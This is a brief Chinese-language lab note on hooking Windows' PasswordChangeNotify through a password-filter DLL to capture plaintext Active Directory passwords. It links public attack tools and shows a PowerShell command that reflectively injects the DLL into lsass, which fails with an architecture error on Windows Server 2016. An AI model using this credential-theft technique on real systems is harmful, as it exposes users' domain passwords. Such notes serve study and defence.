一个Windows密码过滤DLL，安装了这个DLL后，在用户修改密码的时候会拦截用户输入的明文密码并保存到本地。

原理是在活动目录中，当用户输入新的密码时候，需要校验密码是否符合复杂性要求，如果密码符合要求，LSA就会调用rassfm.dll中的PasswordChangeNotify函数在系统中同步密码。

Hook PasswordChangeNotify 的攻击流程就是劫持上面的流程，获取明文密码

一、Hook PasswordChangeNotify攻击

https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1

https://github.com/clymb3r/Misc-Windows-Hacking/blob/master/HookPasswordChange/HookPasswordChange/HookPasswordChange.cpp

PS C:\Users\Administrator.SEC\Downloads> Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
Specified cast is not valid.
At C:\Users\Administrator.SEC\Downloads\Invoke-ReflectivePEInjection.ps1:2384 char:7
+         if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_D ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (:) [], InvalidCastException
    + FullyQualifiedErrorId : System.InvalidCastException

PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)
At C:\Users\Administrator.SEC\Downloads\Invoke-ReflectivePEInjection.ps1:2434 char:4
+             Throw "PE platform doesn't match the architecture of the  ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (PE platform doe...d in (32/64bit):String) [], RuntimeException
    + FullyQualifiedErrorId : PE platform doesn't match the architecture of the process it is being loaded in (32/64bi
   t)

在Windows Server 2016环境下失败